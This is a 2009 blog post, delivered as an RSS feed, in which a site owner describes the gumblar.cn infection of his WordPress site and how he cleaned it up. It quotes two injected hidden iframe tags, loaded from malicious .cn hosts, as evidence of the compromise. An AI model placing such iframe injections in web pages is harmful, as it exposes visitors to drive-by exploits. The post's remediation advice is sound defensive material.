<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Pakzilla &#187; security</title>
	<atom:link href="http://www.pakzilla.com/tag/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.pakzilla.com</link>
	<description>A blog on Programming, Web and Technology</description>
	<lastBuildDate>Tue, 31 Aug 2010 10:06:55 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How to protect your website from gumblar.cn infection</title>
		<link>http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/</link>
		<comments>http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/#comments</comments>
		<pubDate>Wed, 06 May 2009 06:14:12 +0000</pubDate>
		<dc:creator>Tahir Akram</dc:creator>
				<category><![CDATA[Blogging]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/</guid>
		<description><![CDATA[
			
				
			
		
Yesterday one of my websites got infected by a suspicious malware gumblar.cn. This website contains several exploits and trojans that can harm your system. How it starts its infection is to invoke Adobe Acrobat Reader on your machine. I found after browsing my infected site, Acrobat Reader process was running in Task Manager.
According to Google [...]


Related posts:<ol><li><a href='http://www.pakzilla.com/2007/04/08/how-to-make-an-executeable-jar/' rel='bookmark' title='Permanent Link: How to make an executeable jar'>How to make an executeable jar</a></li>
<li><a href='http://www.pakzilla.com/2009/05/17/how-to-solve-image-upload-problem-in-wordpress-blog/' rel='bookmark' title='Permanent Link: How to solve image upload problem in wordpress blog'>How to solve image upload problem in wordpress blog</a></li>
<li><a href='http://www.pakzilla.com/2009/12/08/pakzilla-com-was-down-sorry-for-inconvenience/' rel='bookmark' title='Permanent Link: Pakzilla.com was down. Sorry for inconvenience'>Pakzilla.com was down. Sorry for inconvenience</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.pakzilla.com%2F2009%2F05%2F06%2Fhow-to-protect-your-website-from-gumblarcn-infection%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.pakzilla.com%2F2009%2F05%2F06%2Fhow-to-protect-your-website-from-gumblarcn-infection%2F&amp;source=tahirakram&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>Yesterday one of my websites got infected by a suspicious malware gumblar.cn. This website contains several exploits and trojans that can harm your system. How it starts its infection is to invoke Adobe Acrobat Reader on your machine. I found after browsing my infected site, Acrobat Reader process was running in Task Manager.</p>
<p>According to <a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://gumblar.cn/rss/%3Fid%3D&amp;client=googlechrome&amp;hl=en-US">Google Safe Browsing Service</a></p>
<blockquote><p>What happened when Google visited this site?<br />
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-05, and the last time suspicious content was found on this site was on 2009-05-05.<br />
Malicious software includes 2341 scripting exploit(s), 6 trojan(s).</p>
<p>This site was hosted on 1 network(s) including AS42831 (UKSERVERS).</p></blockquote>
<p><img class="aligncenter size-full wp-image-279" title="gumblar_cn_infection" src="http://www.pakzilla.com/wp-content/upload/gumblar_cn_infection.jpg" alt="gumblar_cn_infection" width="588" height="131" /><br />
I found some of php files were altered by adding a iframe at the end of the page. My infected files were &lt;my-url&gt;/wp-content/themes/&lt;my-theme-dir&gt;/index.php and &lt;my-url&gt;/wp-admin/index.php and in same directory index-extra.php. I didnt found any other file which was infected by this.</p>
<p>I manually removed this embedded iframe  &lt;iframe src=&#8221;http://liteautotop .cn/ts/in.cgi?mozila&#8221; width=2 height=4 style=&#8221;visibility: hidden&#8221;&gt;&lt;/iframe&gt;  and every things works fine.</p>
<p>If you have some type of information about this infection, people will highly appriciate who are messing arround the internet about the solution of this problem.</p>
<p>Update (5/11/09): I am able to remove this malware from my blog and Wordpress admin site.</p>
<p style="text-align: left;"><strong>Removal</strong></p>
<ul>
<li>Removed image.php file from all images folder. image.php infection only found in &#8216;image&#8217; folder. Make sure you didn&#8217;t remove the orignal image.php file. If your orignal file infected, only remove malicious code</li>
<li>Looked for iframe code added on the top or bottom of php page and remove it. I found this iframe which I removed. &lt;iframe src=&#8221;http: //bigtruckstopseek .cn/ts/in.cgi?banner2&#8243; width=2 height=4 style=&#8221;visibility: hidden&#8221;&gt;</li>
<li>Checked all PHP, HTML and JS  files for added anonymous Java Script methods. I found all JS files infected in wp-include directory</li>
<li>Put httpdoc directory permission to 755</li>
<li>Scaned my computer with Malwarebytes&#8217; Anti-Malware, which identified several threats and removed</li>
<li>Updated my AVG Anti Virus</li>
<li>Changed my FTP password</li>
<li>I did all this manual code removal activity from my Pleask control panel</li>
</ul>
<p>Please fell free to make comment and your suggestions to make more security measures to prevent such threats.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-bg-knowledge">
<ul class="socials">
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=How+to+protect+your+website+from+gumblar.cn+infection%3A+http://b2l.me/kp47j+%28via+%40tahirakram%29+&amp;source=shareaholic" rel="nofollow" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/&amp;t=How+to+protect+your+website+from+gumblar.cn+infection" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/&amp;title=How+to+protect+your+website+from+gumblar.cn+infection" rel="nofollow" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/&amp;title=How+to+protect+your+website+from+gumblar.cn+infection" rel="nofollow" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/&amp;title=How+to+protect+your+website+from+gumblar.cn+infection" rel="nofollow" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/&amp;title=How+to+protect+your+website+from+gumblar.cn+infection" rel="nofollow" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/&amp;title=How+to+protect+your+website+from+gumblar.cn+infection" rel="nofollow" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/&amp;imageurl=" rel="nofollow" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/" rel="nofollow" title="Share this on Technorati">Share this on Technorati</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>



<p>Related posts:<ol><li><a href='http://www.pakzilla.com/2007/04/08/how-to-make-an-executeable-jar/' rel='bookmark' title='Permanent Link: How to make an executeable jar'>How to make an executeable jar</a></li>
<li><a href='http://www.pakzilla.com/2009/05/17/how-to-solve-image-upload-problem-in-wordpress-blog/' rel='bookmark' title='Permanent Link: How to solve image upload problem in wordpress blog'>How to solve image upload problem in wordpress blog</a></li>
<li><a href='http://www.pakzilla.com/2009/12/08/pakzilla-com-was-down-sorry-for-inconvenience/' rel='bookmark' title='Permanent Link: Pakzilla.com was down. Sorry for inconvenience'>Pakzilla.com was down. Sorry for inconvenience</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/feed/</wfw:commentRss>
		<slash:comments>22</slash:comments>
		</item>
	</channel>
</rss>
